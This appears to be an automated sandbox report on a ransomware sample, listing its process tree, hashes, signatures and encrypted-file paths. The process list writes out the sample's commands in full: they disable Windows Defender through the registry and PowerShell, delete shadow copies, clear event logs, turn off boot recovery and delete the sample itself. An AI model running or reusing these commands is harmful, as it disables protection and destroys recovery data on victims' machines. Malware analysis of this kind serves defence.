| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe
"C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sXhL_HOW_TO_DECRYPT.txt
C:\Windows\system32\notepad.exe
notepad.exe C:\sXhL_HOW_TO_DECRYPT.txt
C:\Windows\system32\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe"
C:\Windows\system32\PING.EXE
ping.exe -n 5 127.0.0.1
Network
Files
memory/280-54-0x0000000000000000-mapping.dmp
memory/860-55-0x0000000000000000-mapping.dmp
memory/1408-56-0x0000000000000000-mapping.dmp
memory/576-57-0x0000000000000000-mapping.dmp
memory/456-58-0x0000000000000000-mapping.dmp
memory/1752-59-0x0000000000000000-mapping.dmp
memory/1220-60-0x0000000000000000-mapping.dmp
memory/1548-61-0x0000000000000000-mapping.dmp
memory/740-62-0x0000000000000000-mapping.dmp
memory/956-63-0x0000000000000000-mapping.dmp
memory/592-64-0x0000000000000000-mapping.dmp
memory/968-65-0x0000000000000000-mapping.dmp
memory/1292-66-0x0000000000000000-mapping.dmp
memory/1988-67-0x0000000000000000-mapping.dmp
memory/1488-68-0x0000000000000000-mapping.dmp
memory/1816-69-0x0000000000000000-mapping.dmp
memory/1768-70-0x0000000000000000-mapping.dmp
memory/1964-71-0x0000000000000000-mapping.dmp
memory/1732-72-0x0000000000000000-mapping.dmp
memory/1064-73-0x0000000000000000-mapping.dmp
memory/1628-74-0x0000000000000000-mapping.dmp
memory/1704-75-0x0000000000000000-mapping.dmp
memory/1600-76-0x0000000000000000-mapping.dmp
memory/560-77-0x0000000000000000-mapping.dmp
memory/632-78-0x0000000000000000-mapping.dmp
memory/548-79-0x0000000000000000-mapping.dmp
memory/1092-80-0x0000000000000000-mapping.dmp
memory/1548-81-0x0000000000000000-mapping.dmp
memory/1240-82-0x0000000000000000-mapping.dmp
memory/1280-83-0x0000000000000000-mapping.dmp
memory/1088-84-0x0000000000000000-mapping.dmp
memory/1108-85-0x0000000000000000-mapping.dmp
memory/1076-86-0x0000000000000000-mapping.dmp
memory/1612-87-0x0000000000000000-mapping.dmp
memory/920-88-0x0000000000000000-mapping.dmp
memory/1744-89-0x0000000000000000-mapping.dmp
memory/2000-90-0x0000000000000000-mapping.dmp
memory/1560-91-0x0000000000000000-mapping.dmp
memory/1164-92-0x0000000000000000-mapping.dmp
memory/816-93-0x0000000000000000-mapping.dmp
memory/1752-94-0x0000000000000000-mapping.dmp
memory/1780-95-0x0000000000000000-mapping.dmp
memory/968-96-0x0000000000000000-mapping.dmp
memory/1988-97-0x0000000000000000-mapping.dmp
memory/1492-98-0x0000000000000000-mapping.dmp
memory/2016-99-0x0000000000000000-mapping.dmp
memory/1724-100-0x0000000000000000-mapping.dmp
memory/1576-101-0x0000000000000000-mapping.dmp
memory/300-102-0x0000000000000000-mapping.dmp
memory/1788-103-0x0000000000000000-mapping.dmp
memory/1208-104-0x0000000000000000-mapping.dmp
memory/1660-105-0x0000000000000000-mapping.dmp
memory/1496-106-0x0000000000000000-mapping.dmp
memory/544-107-0x0000000000000000-mapping.dmp
memory/1604-108-0x0000000000000000-mapping.dmp
memory/688-109-0x0000000000000000-mapping.dmp
memory/820-110-0x0000000000000000-mapping.dmp
memory/1816-111-0x0000000000000000-mapping.dmp
memory/1748-112-0x0000000000000000-mapping.dmp
memory/1748-113-0x000007FEFB5D1000-0x000007FEFB5D3000-memory.dmp
memory/792-114-0x0000000000000000-mapping.dmp
memory/2044-116-0x0000000000000000-mapping.dmp
memory/340-118-0x0000000000000000-mapping.dmp
memory/1168-119-0x0000000000000000-mapping.dmp
memory/2072-120-0x0000000000000000-mapping.dmp
memory/2168-123-0x0000000002420000-0x0000000002422000-memory.dmp
memory/2168-124-0x0000000002422000-0x0000000002424000-memory.dmp
memory/2168-122-0x000007FEF26A0000-0x000007FEF31FD000-memory.dmp
memory/2168-125-0x0000000002424000-0x0000000002427000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 5f3e24bf06791b742746cf1d4147c47a |
| SHA1 | 8d9411fd28c2010d99111768af97e833cf96ff94 |
| SHA256 | e2851a07ab10ae8029a4e575be0618b023568e46a07ef030a2bfaf9118859940 |
| SHA512 | bd1a1293a2e965e769cae1e7bf6cbf4fbf0780c4e2c740f17dbc6939bac9a211825832100722099fcd2cef35b038496765763ff2bc9cf1fdd6303866d864aacb |
memory/2252-128-0x000007FEF1D00000-0x000007FEF285D000-memory.dmp
memory/2168-129-0x000000000242B000-0x000000000244A000-memory.dmp
memory/2252-130-0x0000000002800000-0x0000000002802000-memory.dmp
memory/2252-131-0x0000000002802000-0x0000000002804000-memory.dmp
memory/2252-132-0x0000000002804000-0x0000000002807000-memory.dmp
memory/2252-133-0x000000000280B000-0x000000000282A000-memory.dmp
C:\Users\Admin\Desktop\sXhL_HOW_TO_DECRYPT.txt
| MD5 | 0faaf901edc6624e206a399a4304718d |
| SHA1 | ade6a2cfc9de081c985583d0a582e2ce42d9eed1 |
| SHA256 | 2b7cba7c7768eeb13ea772d22f31811cc5fc0d707b36c94b68910a53b2765ddb |
| SHA512 | 432728bb08d4dd12b747080b90321629b6b94d79fb77e8a12b0823c6fe1fa89236002267b6852d5a644e3fb04c05ec99a7bc7176eed4eeff1d39445c37dc4906 |
C:\sXhL_HOW_TO_DECRYPT.txt
| MD5 | 0faaf901edc6624e206a399a4304718d |
| SHA1 | ade6a2cfc9de081c985583d0a582e2ce42d9eed1 |
| SHA256 | 2b7cba7c7768eeb13ea772d22f31811cc5fc0d707b36c94b68910a53b2765ddb |
| SHA512 | 432728bb08d4dd12b747080b90321629b6b94d79fb77e8a12b0823c6fe1fa89236002267b6852d5a644e3fb04c05ec99a7bc7176eed4eeff1d39445c37dc4906 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 09:48
Reported
2022-01-13 09:54
Platform
win10-en-20211208
Max time kernel
23s
Max time network
147s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado27.tlb | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado28.tlb | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\ja-JP\ieinstal.exe.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_62PWJabGlKk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\jaccess.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_NYmyxI9f-lg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Apslhrh9_yo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_sjY8Z5KNeJc0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_eYVF-PssGcA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-phonetic.xml | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\lt-LT\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_FftIVTnSA2A0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\et.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_WftgQ7Toq2M0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_hRwhJCaeb5A0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\nb-NO\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_YnBw2yGC-To0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_hW_lsgcy8040.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\an.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_eR6g71watGg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sq.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_jPbmHxM15cI0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado60.tlb | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Roses.htm | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derbynet.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_4j6zXfFgGCo0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_Y0qg0unOXE00.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_ykwczqnRDPU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_zh_4.4.0.v20140623020002.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_uBjFrMW_rCk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_unmMxzl7_Yg0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7zCon.sfx.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_4mkQZaJ0bdU0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipssrb.xml | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_gcXLDsfHeuk0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ro.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_jtA-rVtXgDY0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\ado\de-DE\msader15.dll.mui.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_I4VqksVjAuM0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\en-US\hmmapi.dll.mui | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_MojFr8Px2KY0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\sr-spl.txt.5QPfJehcqfAm1fqfv8O-YZLy6Q61CA1Tax0YsY0ZlYz_f5DELp-7WDA0.rmvlh | C:\Users\Admin\AppData\Local\Temp\9a047e0ffd51190cec150aec2c10bfcf546b75e4442d9280fb6fbfba28a7e083.exe | N/A |
